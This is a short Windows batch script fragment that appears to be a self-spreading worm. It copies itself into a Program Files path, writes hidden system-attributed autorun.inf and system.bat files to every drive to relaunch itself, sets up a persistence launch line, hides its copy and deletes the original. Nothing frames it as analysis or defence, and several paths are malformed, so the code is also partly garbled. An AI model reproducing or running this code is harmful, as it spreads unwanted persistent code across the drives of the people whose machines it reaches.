copy %0 d:Program" "Filesrun.bat
for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start
d:Program" "Filesrun.bat /min
>>%%c:system.bat
for %%c in (%alldrive%) do attrib autorun.inf +r +s +h >>%%c:system.bat
for %%c in (%alldrive%) do attrib %%c:autorun.inf +r +s +h >nul
for %%c in (%alldrive%) do attrib %%c:system.bat +r +s +h >nul
if not exist %windir%/system32/explorer.bat start d:Program" "Filesrun.bat
/min >>d:setup.bat
attrib d:Program" "Filesrun.bat +r +s +h >nul
del %0
exit









